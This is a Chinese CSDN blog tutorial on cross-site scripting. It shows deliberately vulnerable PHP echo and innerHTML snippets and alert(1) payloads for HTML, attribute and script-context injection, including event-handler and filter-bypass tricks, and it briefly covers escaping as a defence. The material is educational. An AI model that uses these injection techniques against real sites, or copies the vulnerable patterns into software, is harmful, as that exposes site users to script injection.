1.XSS代表著攻击者可以在其他人的网站上面执行JavaScript 程序

最新推荐文章于 2024-06-18 16:09:14 发布
最新推荐文章于 2024-06-18 16:09:14 发布
阅读量1.8k 收藏 51
点赞数 29
文章标签: xss javascript 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RuanJian_GC/article/details/139031939
版权

了解

XSS(Cross-site scripting) 就代表著攻击者可以在其他人的网站上面执行JavaScript 程序。

<?php
 echo "Hello, " . $_GET['name'];
?>

如果访问的是 index.php?name=<script>alert(1)</script> 呢?输出的内容就会变成:Hello,<script>alert(1)</script>
<script>标签里的内容将被视为JavaScript代码来执行,屏幕上会弹出一个提示窗口,这意味着可以在其他人的网站中执行JavaScript代码。

<div>
  Hello, <span id="name"></span>
</div>
<script>
  const qs = new URLSearchParams(window.location.search)
  const name = qs.get('name')
  document.querySelector('#name').innerHTML = name
</script>

通过index.html?name=<script>alert(1)</script>的方式可以插入任何我们想要的内容,但这次是通过前端使用innerHTML的方式将我们的 payload 添加到页面上。
两者之间的区别在于前面的例子实际上不会触发alert,原因是在使用innerHTML时,插入的<script>标签没有效果,因此攻击者必须调整XSS payload才能执行代码。

  • localStorage :
  • Cookie:cookieStore API / document.cookie /fetch()与其他api交互

执行js的方式

  1. <script>alert(1)</script>
  2. Inline event handle 在HTML元素中内联(内嵌)的事件处理程序
    1. <img src="not_exist" onerror="alert(1)">
    2. <button onclick="alert(1)">拜託點我</button>
    3. <svg onload="alert(1)">
    4. <svg/onload=alert(1)>
      1. html属性中"非必要,没有空格就可以拿掉
      2. 标签跟属性间的空格可以用/替代
  3. <a href=javascript:void(0)>Link</a>

常用的event handler

  1. onerror
  2. onload
  3. onfocus
  4. onblur
  5. onanimationend
  6. onclick
  7. onmouseenter

常见情景

注入html

直接給你一塊空白的 HTML 讓你去操作,因此可以直接寫入任何想要的元素

<?php
 echo "Hello, <h1>" . $_GET['name'] . '</h1>';
?>

<div>
  Hello, <span id="name"></span>
</div>
<script>
  const qs = new URLSearchParams(window.location.search)
  const name = qs.get('name')
  document.querySelector('#name').innerHTML = name
</script>

<script>alert(1)</script>

防御

把使用者輸入中的 < 跟 > 全部取代掉,它就沒有辦法插入新的 HTML 標籤,就沒辦法做到任何事情。

注入属性

<div id="content"></div>
<script>
  const qs = new URLSearchParams(window.location.search)
  const clazz = qs.get('clazz')
  document.querySelector('#content').innerHTML = `
    <div class="${clazz}">
      Demo
    </div>
  `
</script>

輸入的內容是做為某個屬性的值,被包在屬性裡面的:
我们可以使用"<script>alert(1)</script>来闭合标签,再插入js语句

<div class=""><script>alert(1)</script>  
Demo  
</div>
<>被过滤

" tabindex=1 onfocus="alert(1)" x="
闭合后使用event handler

<div class="" tabindex=1 onfocus="alert(1)" x="">
  Demo
</div>
' " 被过滤

通过空格和/新增属性

document.querySelector('#content').innerHTML = `
  <div class=${clazz}>
    Demo
  </div>

payload:
/onclick=alert(1)

<div class=12 / οnclick=alert(1)>
  Demo
</div>

注入javascript

<script>
  const name = "<?php echo $_GET['name'] ?>";
  alert(name);
</script>
"过滤

</script> 闭合标签,再注入其他标签

``<>"'`过滤

如果在輸入裡面加一個空行,就會因為換行導致整段程式碼無法執行,出現 SyntaxError

<script>
  const name = `
    Hello,
    <?php echo $_GET['name'] ?>
  `;
  alert(name);
</script>

此时可以用${alert(1)} 的方式來注入 JavaScript 程式

参考链接

  1. https://web.archive.org/web/20100723152801/http://blogs.msdn.com/b/dross/archive/2009/12/15/happy-10th-birthday-cross-site-scripting.aspx
  2. https://owasp.org/www-pdf-archive/OWASP-AppSecEU08-Dabirsiaghi.pdf
  3. https://github.com/mandatoryprogrammer/xsshunter-express
  4. https://hackerone.com/reports/948929
  5. Cross-site scripting (XSS) cheat sheet
唐先生的博客
关注
  • 29
    点赞
  • 51
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSSXSS靶场9道题目、如何防御XSS。希望您喜欢~
[网络安全自学篇] 十八.XSS跨站脚本攻击原理及代码攻防演示(一)
杨秀璋的专栏
10-12 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,并构建了Web目录扫描器;本文将详细讲解XSS跨站脚本攻击,从原理、示例、危害到三种常见类型(反射型、存储型、DOM型),并结合代码示例进行详细讲解,最后分享了如何预防XSS攻击。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的编程经验进行讲解。
前端xss攻击——规避innerHtml过滤标签节点及属性
编程知识分享,主打前端
04-01 1万+
大家好,我是yma16,本文分享xss攻击——规避innerHtml过滤script等动态js节点。xss攻击XSS(Cross-Site Scripting)攻击是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本代码注入到网页中,当用户通过浏览器访问这个网页时,这些恶意代码就会被执行,从而使攻击者能够窃取用户的敏感信息,如登录凭据、个人信息等。存储型XSS攻击者将恶意脚本代码存储到目标网站的数据库中,当用户访问含有恶意代码的页面时,代码会从数据库中被提取并执行
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
热门推荐
数据知道的博客
08-29 3万+
人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS(Cross Site Scripting)跨站脚本攻击,是一种网站应用程序的安全漏洞攻击。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。...
前端XSS攻击场景与Vue.js处理XSS的方法:vue-xss
zhangzuying的博客
12-21 3335
前端开发中,跨站脚本攻击(XSS)是一种常见的安全威胁。本文将介绍前端跨站脚本攻击(XSS)的场景以及在Vue.js框架中如何处理XSS的方法。通过了解这些内容,我们可以更好地保护前端应用程序的安全性,防止恶意攻击。一个开箱即用的Vue.js插件,可通过简单的方式防止XSS攻击。
存储型 XSS 攻击演示(附链接)
Flag少侠的博客
01-23 1253
存储型 XSS 攻击演示(附链接)
DOM 型 XSS 攻击演示(附链接)
Flag少侠的博客
01-25 2251
DOM 型 XSS 攻击演示(附链接)
25.XSS跨站原理分类和攻击手法
mingyqf的博客
04-05 4044
XSS跨站原理分类和攻击手法 就是和html语言打交道 归纳很全的大佬文章 二十五:XSS跨站值原理分类及攻击手法 - 九~月 - 博客园 (cnblogs.com) 知识汇总 XSS 跨站漏洞 1. XSS简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大
反射型 XSS 攻击演示(附链接)
Flag少侠的博客
01-22 1949
反射型 XSS 攻击演示(附链接)
18.XSS跨站脚本攻击原理及代码攻防演示(一)1
08-03
假设一个网站在搜索框中没有对用户输入进行过滤,攻击者可以在搜索框输入`<script>alert('XSS');</script>`,如果这个输入被原样显示在结果页上,那么所有访问这个页面的用户都会看到一个弹出的警告框,这就是一个...
springboot2.x使用Jsoup防XSS攻击的实现
10-15
XSS攻击是一种常见且危害极大的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意脚本,从而窃取用户敏感信息、操纵页面内容或是实施其他恶意行为。 XSS攻击的基本原理是攻击者通过注入恶意脚本到网页中,当...
ThinkPHP2.x防范XSS跨站攻击的方法
10-23
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全问题,它允许攻击者在用户浏览器上执行恶意脚本。在ThinkPHP2.x框架中,由于框架本身可能存在一些安全漏洞,使得XSS攻击成为可能。下面我们将深入探讨...
调查:XSS攻击Web应用程序-研究论文
05-20
XSS攻击是一种注入攻击,其中攻击者在客户端程序的用户端或数据库的服务器端将侵犯性内容注入站点。 恶意代码基本上是JavaScript代码,并且在Web应用程序的输入字段中执行XSS攻击的类型为非持久(或反映)的XSS...
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
Pikachu靶场--XSS
qq_65150735的博客
06-17 998
Pikachu靶场--XSS跨站脚本
xss+csrf项目实例
qq_64302290的博客
06-16 528
如下:我们是在一个类似文章管理系统的网站上面发现的该漏洞。我们将其运行在本地的phpstudy集成环境上面。源码地址下载链接:https://pan.baidu.com/s/1MpnSAq7a_oOcGh4XgPE-2w提取码:4444。
XSS跨站脚本攻击
最新发布
q
06-18 690
使用网站上的本身有的swf文件进行反编译,常见的可触发xss的危险函数有:getURL,navigateToURL,ExternalInterface.call,htmlText,loadMovie等等。持续化的XSS攻击方式,将恶意代码存储于服务器,当其他用户再次访问时触发,造成XSS攻击。页面本身没有变化,但由于DOM环境被恶意修改,有客户端代码被包含进了页面并执行。通过修改原始的客户端代码,受害者浏览器的DOM环境改变,导致有效载荷的执行。使用pdf编辑器,打开属性,添加动作,选择执行js语句。
模板引擎与 XSS 防御
A526847的博客
06-17 483
在当前流行的 MVC 框架中,View 层常用的技术是使用模板引擎对页面进行渲染,比如在“跨站脚本攻击”一章中所提到的 Django,就使用了 Django Templates 作为模板引擎。但是正如前文所述,最好的 XSS 防御方案,在不同的场景需要使用不同的编码函数,如 果统一使用这 5 个字符的 HtmlEncode,则很可能会被攻击者绕过。同时在模板系统中,搜索不安全的 变量也有了依据,甚至在代码检测工具中,可以自动判断出需要使用哪一种安全的编码方法, 这在安全开发流程中是非常重要的。
1.什么是 XSS 攻击?如何预防?
05-26
XSS(Cross-site scripting)攻击是一种常见的Web安全漏洞,攻击者通过在Web页面中注入恶意脚本,使用户在浏览时执行这些脚本,从而达到窃取用户信息、篡改页面内容等恶意目的。 预防XSS攻击的方法包括: 1.输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

唐先生的博客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值